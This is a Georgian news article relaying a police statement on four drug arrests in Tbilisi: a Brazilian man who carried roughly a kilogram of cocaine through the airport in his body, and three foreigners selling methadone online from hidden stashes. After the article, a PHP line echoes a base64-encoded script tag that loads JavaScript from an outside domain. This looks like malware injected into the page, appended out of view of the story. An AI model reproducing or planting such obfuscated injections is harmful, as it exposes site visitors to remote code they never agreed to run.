celsiusi
ავერსი საქკაბელი
თბილისში ნარკოდანაშაულისთვის 4 პირი დააკავეს. პოლიციმ 1 კილომდე "კოკაინი" და სხვადასხვა ნარკოტიკული საშუალებები მოიღო.  დაკავებულებს შორის არიან უცხო ქვეყნის მოქალაქეები, რომელთაც ნარკოდანაშაულს ედავებიან.
 
საგამოძიებო მოქმედებები თბილისში ჩატარდა. პოლიციამ ერთ-ერთი დამნაშავე, აეროპორტში დააკავა, რომელსაც 1 კილოგრამამდე კოკაინი საქართველოში შემოჰქონდა. დანაშაული 20 წლამდე ან უვადო პატიმრობას ითვალისწინებს.
 
"ცენტრალური კრიმინალური პოლიციის დეპარტამენტის თანამშრომლებმა, შემოსავლების სამსახურის საბაჟო დეპარტამენტის თანამშრომლებთან ერთად, ბრაზილიის მოქალაქე - 1993 წელს დაბადებული ფ.ს. თბილისში დააკავეს. აღნიშნული პირის დაკავება განხორციელდა გაეროს ნარკოტიკების და დანაშაულის წინააღმდეგ ბრძოლის ოფისისა (UNODC) და მსოფლიო საბაჟო ორგანიზაციის (WCO) კონტეინერების კონტროლის პროგრამის წევრების თანამშრომლობით.
 
გამოძიებით დადგინდა, რომ ფ.ს.-ს, თბილისის საერთაშორისო აეროპორტის გავლით, საქართველოში 1 კილომდე ნარკოტიკული საშუალება "კოკაინი" სხეულით შემოჰქონდა. ნივთმტკიცებად ამოღებულია 80 შეკვრად დაფასოებული ნარკოტიკული საშუალება "კოკაინი".
 
სამართალდამცველებმა თბილისში ნარკოტიკების ინტერნეტით უკანონო გასაღების ფაქტი აღკვეთეს და დედაქალაქში სხვადასხვა ადგილზე შემდგომი რეალიზაციის მიზნით განთავსებული ნარკოტიკები ამოიღეს.
 
ცენტრალური კრიმინალური პოლიციის დეპარტამენტის ნარკოტიკების უკანონო ბრუნვის წინააღმდეგ ბრძოლის მთავარი სამმართველოს თანამშრომლებმა ნარკოდანაშაულისთვის დააკავეს ორგანიზებული დანაშაულებრივი ჯგუფის წევრები, უცხო ქვეყნის 3 მოქალაქე: 1995 წელს დაბადებული ვ.ტ.,1988 წელს დაბადებული ა.ნ. და 1996 წელს დაბადებული ე.დ.
 
გამოძიებით დადგინდა, რომ ბრალდებულები ნარკოტიკულ საშუალებებს მცირე შეკვრებად აფასოებდნენ, თბილისში სხვადასხვა მისამართებზე, სამალავებში ათავსებდნენ, შემდეგ კი ერთ-ერთი ინტერნეტპლატფორმის საშუალებით ასაღებდნენ,
 
პოლიციამ დაკავებულების პირადი და საცხოვრებელი სახლის ჩხრეკისას 250 გრამამდე „მეტადონის“ შემცველი ნარკოტიკული ნივთიერება და ფული ამოიღო. ასევე ნივთმტკიცების სახით ამოღებულია ბრალდებულების მიერ სხვადასხვა ლოკაციაზე შემდგომი გასაღების მიზნით განთავსებული „მეტადონის“ შემცველი ნარკოტიკი.
 
განსაკუთრებით დიდი ოდენობით ნარკოტიკული საშუალებების უკანონო შეძენა- შენახვისა და გასაღების მცდელობის, ასევე საქართველოში ნარკოტიკული საშუალებების უკანონოდ შემოტანის ფაქტებზე გამოძიება საქართველოს სისხლის სამართლის კოდექსის 260-ე,19-260-ე და 262-ე მუხლებით მიმდინარეობს," - ნათქვამია განცხადებაში. 
777
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");